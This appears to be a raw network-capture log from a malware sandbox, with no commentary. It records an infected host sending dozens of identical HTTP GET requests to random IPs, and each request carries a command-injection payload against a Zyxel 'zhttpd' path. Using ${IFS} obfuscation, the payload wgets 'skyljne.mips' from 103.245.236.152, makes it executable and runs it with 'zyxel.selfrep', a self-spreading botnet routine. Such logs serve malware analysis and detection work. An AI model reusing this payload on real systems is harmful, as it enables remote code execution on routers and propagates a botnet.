                                          Jan 14, 2024 15:46:26.221894026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6752192.168.2.2337696218.180.41.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221940041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6753192.168.2.2333686136.67.33.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221957922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6754192.168.2.2335096209.67.185.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222009897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6755192.168.2.2348196159.47.144.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222028017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6756192.168.2.2353396130.74.143.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222070932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6757192.168.2.2350854174.185.57.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222110987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6758192.168.2.2335662105.226.253.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222125053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6759192.168.2.2334110154.100.64.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222147942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6760192.168.2.2345996200.168.3.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222162008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6761192.168.2.234251035.89.6.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222178936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6762192.168.2.2358456216.196.27.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222198963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6763192.168.2.2344386157.196.96.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222243071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6764192.168.2.236008654.64.21.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222258091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6765192.168.2.2333588178.84.252.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222290039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6766192.168.2.2344420199.28.108.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222349882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6767192.168.2.236009414.126.237.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222354889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6768192.168.2.235110491.24.192.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222376108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6769192.168.2.2360950140.99.230.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222423077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6770192.168.2.2337320112.150.162.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222436905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6771192.168.2.234088024.170.206.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222465038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6772192.168.2.2343408201.14.46.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222490072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6773192.168.2.235149860.241.107.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222523928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6774192.168.2.2339728138.57.33.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222537994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6775192.168.2.2341140155.123.105.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222552061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6776192.168.2.2346436182.198.9.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222580910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6777192.168.2.2338178187.240.243.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222615004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6778192.168.2.2349772107.9.30.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222647905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6779192.168.2.235527683.21.2.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222678900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6780192.168.2.2334666173.145.36.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222686052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6781192.168.2.2337772183.165.144.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222717047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6782192.168.2.2339004213.234.167.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222752094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6783192.168.2.234426625.246.127.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222785950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6784192.168.2.2355820169.176.215.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222814083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6785192.168.2.235991432.172.81.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222836971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6786192.168.2.2343072111.102.195.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222853899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6787192.168.2.2342112100.156.137.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222913980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6788192.168.2.2343404139.188.23.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222948074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6789192.168.2.2335110190.233.175.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.222968102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6790192.168.2.2360938146.71.64.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223005056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6791192.168.2.2335588102.111.22.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223027945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6792192.168.2.234427289.143.17.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223045111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6793192.168.2.233988881.40.123.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223082066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6794192.168.2.2339962174.77.143.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223108053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6795192.168.2.2352512156.41.137.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223123074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6796192.168.2.2352456166.224.177.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223161936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6797192.168.2.2337182146.139.119.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223212004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6798192.168.2.2348356212.50.38.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223233938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6799192.168.2.2340378141.252.0.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223267078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6800192.168.2.235048032.125.145.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223288059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6801192.168.2.234412277.218.207.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223309994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6802192.168.2.2343900213.39.175.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223335028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6803192.168.2.233724825.160.252.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223378897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6804192.168.2.2359098175.183.239.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223417044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6805192.168.2.23589181.41.162.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223437071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6806192.168.2.2350982220.213.190.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223448992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6807192.168.2.23491561.166.27.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223488092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6808192.168.2.2345340151.94.78.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223531961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6809192.168.2.2346450209.213.161.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223556042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6810192.168.2.2350818106.226.76.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223570108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6811192.168.2.235255220.89.134.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223573923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6812192.168.2.2358708211.93.15.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223628044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6813192.168.2.23558804.43.19.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223658085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6814192.168.2.233472269.15.106.38443
                                          TimestampBytes transferredDirectionData
